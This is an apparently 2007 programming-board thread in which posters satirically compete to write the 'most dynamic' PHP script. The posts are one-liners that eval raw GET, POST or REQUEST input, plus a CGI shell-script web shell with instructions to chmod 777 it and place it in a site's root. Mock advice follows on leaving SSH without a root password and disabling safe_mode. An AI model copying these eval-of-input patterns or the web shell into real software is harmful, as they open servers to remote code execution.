Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

most dynamic script possible

Name: Anonymous 2007-09-05 20:19 ID:XPQb0eGV

i'm trying to code the most dynamic script possible. what has /prog/ accomplished?

my own, open-source code:

<?php eval($_GET['php']); ?>

Name: Anonymous 2007-09-05 20:23 ID:UhztgcPz

given the size of apache, php, the OS you rely on your dynamic script is not very impressive.

Name: Anonymous 2007-09-05 23:20 ID:GX+1AD47

``please abuse me''

Name: Anonymous 2007-09-06 1:07 ID:Heaven

>>1
i'm trying to code the most exploitable script possible.

fix'd

Name: Anonymous 2007-09-06 1:47 ID:uZwmNMUE

>>3
that's what she said.

Name: Anonymous 2007-09-06 2:51 ID:KPJZ0Uz+

>>1
Read SICP.

Name: Anonymous 2007-09-06 4:27 ID:oAKWola3

(loop (print (eval (read))))

Name: Anonymous 2007-09-06 4:37 ID:Heaven

>>5
lol

>>6
Seconded

Name: Anonymous 2007-09-06 7:53 ID:n9+8O469

1) save as shell.cgi
2) chmod 777 shell.cgi
3) place in root directory of website
4) give me your web adress
5) ???
6) profit!

echo Content-type: text/html
echo ""

/bin/cat << EOM1
  <HTML>
        <link rel="stylesheet" type="text/css" href="http://lolz0r.net/css/terro
r.css" title="Terror">
  <HEAD><TITLE>lolz0r.net remote shell</TITLE>
  </HEAD>
  <BODY bgcolor="#000000" text="#00ff00">
  <HR SIZE=1>
  <P>
  <ISINDEX prompt="enter command: " action="http://localhost/cgi-bin/isindex-sea
rch">
  <P>
EOM1
/bin/cat << EOM2
  <P>
  <PRE>
EOM2

$*

/bin/cat << EOM3
  </PRE>
  <P>
  </BODY>
  </HTML>
EOM3

Name: Anonymous 2007-09-06 7:53 ID:n9+8O469

>>9 almost forgot - add #!/bin/sh to the top, for great success

Name: Anonymous 2007-09-06 7:58 ID:mlFlXzLI

OPTIMISED

<?=eval($php)?>

Name: Anonymous 2007-09-06 13:47 ID:bt9AeIv5

>>11
Unfortunately this requires register_globals, and therefore is not forward-compatible.

Here's an upgrade I've been working on since last night:

<?php foreach(array('_GET','_POST','_COOKIE') as $key) eval($$key); ?>

Name: Anonymous 2007-09-06 13:54 ID:Heaven

>>12
<?php foreach($_REQUEST as $key) eval($$key); ?>

Optimized.

Name: Anonymous 2007-09-06 13:56 ID:93ns+TWi

php + optimized = lol

Name: Anonymous 2007-09-06 14:04 ID:bt9AeIv5

>>13
Excellent point, I completely overlooked the need for a sub-loop in my clearly inefficient code.

<?php
foreach($_REQUEST as $key => $value) {
  if(get_magic_quotes_gpc()) stripslashes($value);
  eval($value);
}
?>

This update will make sure that magic_quotes_gpc does not interfere with our code.

Name: Anonymous 2007-09-06 14:41 ID:53Srcpll

<?php array_map( array_map( $_REQUEST, get_magic_quotes_gpc() ? 'stripslashes' : create_function( '$x', 'return $x' ) ), 'eval' );

Name: Anonymous 2007-09-06 14:42 ID:Heaven

Oops, eval should be before that array_map.

Name: Anonymous 2007-09-06 14:44 ID:Heaven

Hell, why not..
<?php array_map( $_REQUEST, create_function( '$x', ( get_magic_quotes_gpc() ? '$x = stripslashes($x);' : '' ) . 'return eval($x)' ) );

Name: Anonymous 2007-09-06 15:28 ID:8f0V2lI6

<?php eval(join(';', array_map($_REQUEST, get_magic_quotes_gpc() ? 'stripslashes' : create_function('$x', 'return $x;')))); ?>

Name: Anonymous 2007-09-06 16:17 ID:Heaven

Christ, just leave OpenSSH running with no root password. Same effect, less code.

Name: Anonymous 2007-09-06 16:43 ID:bt9AeIv5

>>20
Excellent catch.

Make sure to disable open_basedir and safe_mode in php.ini!!

Name: Anonymous 2009-03-06 8:37


Dynamic web pages Fucking.

Name: Anonymous 2011-02-03 1:53

Name: Anonymous 2011-02-04 16:22

Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -